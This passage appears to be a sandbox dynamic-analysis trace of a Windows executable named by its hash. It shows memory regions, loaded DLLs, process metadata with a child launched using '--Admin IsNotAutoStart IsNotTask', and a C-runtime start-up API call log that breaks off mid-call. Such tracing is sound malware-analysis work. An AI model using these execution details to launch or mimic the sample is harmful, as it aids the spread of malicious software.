"\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 879 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 880 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 881 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 882 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 883 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 884 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 885 start_va = 0x370000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 886 start_va = 0x410000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 887 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 888 start_va = 0x748a0000 end_va = 0x748c0fff monitored = 0 entry_point = 0x748a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 889 start_va = 0x75b90000 end_va = 0x75bd4fff monitored = 0 entry_point = 0x75b911e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 890 start_va = 0x20000 end_va = 0x25fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "icacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ICacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\icacls.exe.mui") Region: id = 891 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 60 os_tid = 0xf4c Thread: id = 61 os_tid = 0xf50 Process: id = "5" image_name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" page_root = "0x44742000" os_pid = "0xf58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xf20" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 926 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 927 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 928 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 929 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 930 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 931 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 932 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498440 region_type = mapped_file name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") Region: id = 933 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 934 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 935 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 936 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 937 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 938 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 939 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 940 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 941 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 942 start_va = 0x1a0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 943 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 944 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 945 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 946 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 947 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 948 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 949 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 950 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 951 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 952 start_va = 0x2540000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 953 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 954 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 955 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 956 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 957 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 958 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 959 start_va = 0x360000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 960 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 961 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 962 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 963 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 964 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 965 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 966 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 967 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 968 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 969 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 970 start_va = 0x210000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 971 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 972 start_va = 0x2540000 end_va = 0x26c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002540000" filename = "" Region: id = 973 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 974 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 975 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 976 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 977 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 978 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 979 start_va = 0x210000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 980 start_va = 0x270000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 981 start_va = 0x2800000 end_va = 0x2980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 982 start_va = 0x2990000 end_va = 0x3d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 983 start_va = 0x280000 end_va = 0x311fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 984 start_va = 0x3d90000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d90000" filename = "" Region: id = 985 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 986 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 987 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 988 start_va = 0x3d90000 end_va = 0x3eaafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 989 start_va = 0x739d0000 end_va = 0x73a4ffff monitored = 0 entry_point = 0x739e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 990 start_va = 0x3eb0000 end_va = 0x3faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 991 start_va = 0x3fb0000 end_va = 0x408efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fb0000" filename = "" Region: id = 992 start_va = 0x739b0000 end_va = 0x739c2fff monitored = 0 entry_point = 0x739b1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 993 start_va = 0x210000 end_va = 0x212fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1010 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Thread: id = 63 os_tid = 0xf5c [0094.404] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9e972a80, dwHighDateTime=0x1d8a8ba)) [0094.404] GetCurrentProcessId () returned 0xf58 [0094.404] GetCurrentThreadId () returned 0xf5c [0094.404] GetTickCount () returned 0xf712e8 [0094.404] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=1631361764967) returned 1 [0094.404] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x49ed00)) [0094.404] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.404] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x250000 [0094.406] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0094.406] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0094.406] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0094.406] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0094.406] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0094.407] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x214) returned 0x2507d0 [0094.407] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0094.408] GetCurrentThreadId () returned 0xf5c [0094.408] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x49a5e6, hStdOutput=0x49a91f, hStdError=0x2507d0)) [0094.408] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x800) returned 0x2509f0 [0094.408] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0094.408] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0094.408] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0094.408] SetHandleCount (uNumber=0x20) returned 0x20 [0094.408] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask" [0094.408] GetEnvironmentStringsW () returned 0x2711f50* [0094.408] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xb0e) returned 0x2511f8 [0094.408] FreeEnvironmentStringsW (penv=0x2711f50) returned 1 [0094.408] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x252b980, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x5f [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x116) returned 0x251d10 [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x98) returned 0x251e30 [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3e) returned 0x251ed0 [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x56) returned 0x251f18 [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x6e) returned 0x251f78 [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x78) returned 0x251ff0 [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x62) returned 0x252070 [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x2520e0 [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x48) returned 0x252118 [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x252168 [0094.409] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x252198 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x34) returned 0x2521c0 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x252200 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x32) returned 0x252268 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x2522a8 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x2522e0 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x12a) returned 0x252308 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x7c) returned 0x252440 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x36) returned 0x2524c8 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3a) returned 0x252508 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x90) returned 0x252550 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x24) returned 0x2525e8 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x252618 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x36) returned 0x252650 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x48) returned 0x252690 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x52) returned 0x2526e0 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3c) returned 0x252740 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xd6) returned 0x252788 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x252868 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1e) returned 0x2528a0 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2c) returned 0x2528c8 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x54) returned 0x252900 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x52) returned 0x252960 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2c) returned 0x2529c0 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x26) returned 0x2529f8 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3e) returned 0x252a28 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x24) returned 0x252a70 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x252aa0 [0094.410] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x8c) returned 0x252ad8 [0094.414] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2511f8 | out: hHeap=0x250000) returned 1 [0094.415] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0094.415] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x80) returned 0x252b70 [0094.415] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x800) returned 0x2511f8 [0094.415] GetLastError () returned 0x0 [0094.415] SetLastError (dwErrCode=0x0) [0094.415] GetLastError () returned 0x0 [0094.415] SetLastError (dwErrCode=0x0) [0094.415] GetLastError () returned 0x0 [0094.415] SetLastError (dwErrCode=0x0) [0094.415] GetACP () returned 0x4e4 [0094.415] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x220) returned 0x251a00 [0094.416] GetLastError () returned 0x0 [0094.416] SetLastError (dwErrCode=0x0) [0094.416] IsValidCodePage (CodePage=0x4e4) returned 1 [0094.416] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0094.416] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0094.416] GetLastError () returned 0x0 [0094.416] SetLastError (dwErrCode=0x0) [0094.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0094.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0094.416] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0094.416] GetLastError () returned 0x0 [0094.416] SetLastError (dwErrCode=0x0) [0094.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0094.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | 